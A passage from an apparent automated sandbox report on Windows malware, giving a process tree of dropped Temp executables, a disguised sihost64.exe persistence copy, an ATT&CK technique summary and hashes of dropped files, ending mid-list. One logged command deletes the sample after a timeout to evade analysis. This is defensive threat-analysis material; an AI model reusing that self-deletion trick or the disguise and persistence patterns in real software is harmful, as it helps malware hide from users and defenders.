                                                                                                                                                                                                                                                                                                                            PID:7824
                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                            PID:5884
                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:6336
                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:4768
                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Picture Lab\Pictures Lab.exe
                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:8940
                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\i-record\i-record.exe"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:5708
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\17D9.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\17D9.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:8016
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\17D9.exe
                                                                                                                                                                                                                                                                                                                                      "{path}"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:4736
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\17D9.exe
                                                                                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:4508
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1B45.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1B45.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:8592
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\27D9.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\27D9.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:7860
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\27D9.exe
                                                                                                                                                                                                                                                                                                                                              "{path}"
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:8484
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bd27e327e1aa86cb6c58f98cc8ccbac09a82a292.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\bd27e327e1aa86cb6c58f98cc8ccbac09a82a292.exe"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:8932
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bd27e327e1aa86cb6c58f98cc8ccbac09a82a292.exe"
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:9040
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                          PID:8164
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\res.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\res.exe"
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7920
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:7352
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:7660
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:6984
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3096
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6072
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3544
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5536
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4752
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6760
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:4684
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5160
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:8632
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7848
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:8936
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:8968
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4744
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4624
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8360
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1DD9.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1DD9.exe
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:5948
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4150.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4150.exe
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:8804
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\51FB.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\51FB.exe
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7888

                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1158

                                                                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1222

                                                                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1158

                                                                                                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                                                                Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1518

                                                                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                8
                                                                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                                                                Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1063

                                                                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\unins0000.dat
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  b1fea024dd26bb61f24d14f74e21574c

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  750ecb662506d66fc5a8477ad9f92685f8c9e7ee

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  2038c6a04451ac48ad3cf25d95bb1bfded2d7b6d0b7c012dad70a71205ea71c9

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  78633190ac428fc5b8686ef14a36214d305e57dec6281bf70a1f02d918a3db1e54b30a3941312958b4db861c2ba37c61cc8880382dab3959f728b377ca9f1a86

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\unins0000.dll
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  466f323c95e55fe27ab923372dffff50

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  b2dc4328c22fd348223f22db5eca386177408214

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  6bfb49245a5a92113a71f731fc22fbb8397f836a123b3267196a2a4f8dd70c5c

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  60e242f873d76f77ec7486460d1181468ed060113f6331ab0a4bb540531e0526177819b1413edb316e1d133bd467cfcaacbbe6eb6f63f5b9a9777f50de39cbb6

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\unins0000.vbs
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  6074e379e89c51463ee3a32ff955686a

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  0c2772c9333bb1fe35b7e30584cefabdf29f71d1

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  3d4716dfe7a52575a064590797413b4d00f2366a77af43cf83b131ab43df145e

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  0522292e85b179727b62271763eecb23a2042f46023336034ae8f477cd25a65e12519582d08999116d193e6e105753685356b0244c451139a21d4174fb4f6933

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  2d34eaf9b7248e8783dcd5bee90a8233

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  24c793e1bf07b2117d16c515f31e6e3d0ec61eb4

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  e3f41608808e1a3af150c280efec620517b2264121b2b9c8e1660b53b86e8dd3

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  85557b5a0b4e591bb5a187ea102bf88a00dd54b6e07f132456122d4833b5e892fdbef8cedc6b61726b312b8d2e221318044bc5458a27328cca49d88f5b659562

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  c4c7e76d58ceaa39de6250c21c5d9b56

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  fa8bb74675f70352d3cfeca1c89a2e70df1d3a50

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  1477a034f7e57411cb15d50784fd90a0d9cb7c5630f1b35e6d9fef332d1645a4

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  bd448f7906560c22081ef18472a77bcc6dc5157b1cb7093c642f44ab1f94af66749ac3dea10b29b1eed29dcf3a201cb480a4198bb9be8934f91de81a47770c4a

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  b2a79a05faa8de8d0c9eb9196873dd3e

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  7c4bcc19e45dc05f1681ed545028bb6fea3bdc1d

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  c58fe2453a9382d21948e7564df83a79d289f529664c7f531ffbf82e14550c67

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  dbd0ca31faa4e332d9f14cae3d8f91f13ed07ad523936014e8ffa57031db9b255b4d70ee7e62e0913808634bf41d417db05e4d566752ec3c2159fcb280af4104

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  bdf0304fdddb3dbe0fa3f8a4864a20bb

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  27b97129b104bb3a0bfc882b8762d225902fceaf

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  bfd22a0f4e43cde763988dfa72a4955b6a8d9ece2a075ff18ba844a1624c00d6

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  b4d4938a699dad817db6c46b042c5e6cfac6da39f5ef67f14c191b0f7b0199cbb64f65d543b869541879b66b5e6f05d2407370de69e2af4af5fb3cae47c89644

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  bc26175bdbfefac5b53cc6d766820c03

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  7b24bd49546857459855537a4230c3ddfc666904

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  2ff749dd5448bc9eb6b7aabca544fbb2b3580f0494d25ffb0972732f6fe7bf61

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  f735a4c3f50d893c8fedab0d022cfc29b65ce280bbda759e954dc22e0b37ef1b158d4d03f3ab9428ed2e313f43dad210e851f05f44ebd60792eed68b1f6ff1a4

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  a6588b9854a58cf2a6277317766fe291

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  2ca461d693b0c582311c5c1500f49c01ea7bc18f

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  01324da705bb3ec7928bca9cb5f0b2825d4c72b68c0a0147fb600b436b343c72

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  f1a386667fb68ec5c68ba42d14161fdfef8517ef5038f473fb348e3246ee3ac91b551aa34141334fdb88a06dae56a7a3ed1e701870875839ae235bdccb9bb842

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\multitimer.exe.log
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  fa65eca2a4aba58889fe1ec275a058a8

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  0ecb3c6e40de54509d93570e58e849e71194557a

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  95e69d66188dd8287589817851941e167b0193638f4a7225c73ffbd3913c0c2e

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  916899c5bfc2d1bef93ab0bf80a7db44b59a132c64fa4d6ab3f7d786ad857b747017aab4060e5a9a77775587700b2ac597c842230172a97544d82521bfc36dff

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4kap1z2zif2\fqacravoy5h.exe
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  b749832e5d6ebfc73a61cde48a1b890b

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  a6b4fda0e4ab8137b6e8cdfea85ba66ff4b11b4b

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  b88584dde985bb05eef183a2f339bef9ebdf7adf3b7ce58a71e78e638e6a2123

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  fc197954eaa1b651ed8dc1b32b6547542281633acbfcd29a3acbb4eb5859a9aad00effcce40d76115ffbb8d0ee189b25813beabeafabee2d419dee6fa8383a21

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4kap1z2zif2\fqacravoy5h.exe
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  b749832e5d6ebfc73a61cde48a1b890b

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  a6b4fda0e4ab8137b6e8cdfea85ba66ff4b11b4b

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  b88584dde985bb05eef183a2f339bef9ebdf7adf3b7ce58a71e78e638e6a2123

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  fc197954eaa1b651ed8dc1b32b6547542281633acbfcd29a3acbb4eb5859a9aad00effcce40d76115ffbb8d0ee189b25813beabeafabee2d419dee6fa8383a21

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5hflz34nbuv\KiffApp1.exe
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  cbbde79ebcf4723302759add9ad325c8

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  6c6b0062e730ceee7712bfd08a5f6c77de479803

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  708792efb81b227398454586621dce3b89dc7a1fbd72aa0673eb7846d6261353

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  8ccc9b910f19aa51fe5bc62eaa21f392afeed76f119c8542b263be86c8d92c256243f1a2eec148297f1250dba6a2e17a6c7a418251edd7722989e079df222ea3

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5hflz34nbuv\KiffApp1.exe
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  cbbde79ebcf4723302759add9ad325c8

                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                  6c6b0062e730ceee7712bfd08a5f6c77de479803

                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                  708792efb81b227398454586621dce3b89dc7a1fbd72aa0673eb7846d6261353

                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                  8ccc9b910f19aa51fe5bc62eaa21f392afeed76f119c8542b263be86c8d92c256243f1a2eec148297f1250dba6a2e17a6c7a418251edd7722989e079df222ea3

                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\98AQVPMJVU\setups.exe
                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                  0554b2a90322539504c5d664b5e8796a

